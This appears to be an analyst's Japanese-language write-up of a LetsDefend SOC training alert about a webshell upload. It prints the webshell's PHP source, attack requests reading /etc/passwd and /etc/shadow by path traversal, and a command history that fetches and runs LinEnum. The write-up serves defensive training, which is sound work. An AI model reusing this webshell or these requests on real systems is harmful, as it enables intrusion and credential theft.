LetsDefend level 1 alert SOC128 - Malicious File Upload Attempt event-id 62
Details
EventID: 62
Event Time: Feb. 22, 2021, 4:31 p.m.
Rule: SOC128 - Malicious File Upload Attempt
Level: Security Analyst
Source Address 172.16.20.4
Source Hostname gitServer
File Name phpshell.php
File Hash 756215a64e7d43153298f1a5a5fde295
File Size 113.00 B
Device Action Allowed
Download (Password:infected): 756215a64e7d43153298f1a5a5fde295.zip
playbook
Define Threat Indicator
Answer: Other
Check if the malware is quarantined/cleaned
LogManagement
phpshell.phpへのアクセスがアラート後に2件。
| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 359 | Feb, 22, 2021, 04:32 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 360 | Feb, 22, 2021, 04:33 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
359
Raw Log Request URL: 172.16.20.4/srcCode/phpshell.php?cmd=whoami Request Method: GET Device Action: Allowed
360
Raw Log Request URL: 172.16.20.4/srcCode/phpshell.php?cmd=cat /etc/passwd Request Method: GET Device Action: Allowed
WoW
EndpointManagement
CMD History 2020-10-19 17:10: pwd 2020-10-19 17:12: ls 2020-10-19 18:12: wget -h 2020-10-19 21:54: wget https://raw.githubusercontent.com/django/django/master/setup.py 2020-10-19 21:55: cd 2021-02-13 16:47: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /tmp/ah22idah.sh 2021-02-13 16:48: clear 2021-02-13 16:49: chmod +x /tmp/ah22idah.sh 2021-02-13 16:50: ./tmp/ah22idah.sh 2021-02-22 16:32: whoami 2021-02-22 16:33: cat /etc/passwd
LinEnum.shでコンピュータ内の情報収集......
Answer :Not Quarantined
Analyze Malware
間違いなくMaliciousだが確認を行う。
phpshell.php
VirusTotal:https://www.virustotal.com/gui/file/f1c5bed9560a1afe9d5575e923e480e7e8030e10bc3d7c0d842b1a64f49f8794
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
単純なwebshellである。
49.234.71.65
VirusTotal: https://www.virustotal.com/gui/ip-address/49.234.71.65
ip-sc: https://ip-sc.net/ja/r/49.234.71.65
AbuseIPDB: https://www.abuseipdb.com/check/49.234.71.65
sshのブルートフォース等で知られているらしい。
Answer: Malicious
Check If Someone Requested the C2
| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 358 | Feb, 22, 2021, 04:31 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 359 | Feb, 22, 2021, 04:32 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 360 | Feb, 22, 2021, 04:33 PM | Proxy | 49.234.71.65 | 42212 | 172.16.20.4 | 80 |
| 361 | Feb, 21, 2021, 07:57 PM | Proxy | 49.234.71.65 | 33212 | 172.16.20.4 | 80 |
| 362 | Feb, 21, 2021, 05:02 PM | Proxy | 172.16.20.4 | 80 | 49.234.71.65 | 33212 |
| 363 | Feb, 21, 2021, 05:02 PM | Proxy | 49.234.71.65 | 33212 | 172.16.20.4 | 80 |
| 364 | Feb, 21, 2021, 05:02 PM | Proxy | 172.16.20.4 | 80 | 49.234.71.65 | 33212 |
さらに多くのアクセスを確認
358
Raw Log Request URL: 172.16.20.4/srcCode/upload.php Request Method: GET Device Action: Allowed
アップロードフォームからwebshellのアップロードを行った。
361
Raw Log Request URL: https://amesiana.com/ Request Method: GET
ミスしたログ?
362
Raw Log Response Code: 404
何かダウンロードさせようとしたが失敗したのか。
363
Raw Log Request URL: 172.16.20.4/srcCode/show.php?page=../../../../../../../etc/shadow Request Method: GET
成功したかは分からない。
364
Raw Log Response Code: 404
再びダウンロード失敗したか。
Answer:Accessed
Containment
Containment!
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| 756215a64e7d43153298f1a5a5fde295 | MD5 Hash | webshell |
| 49.234.71.65 | IP Address | C2 server |
End
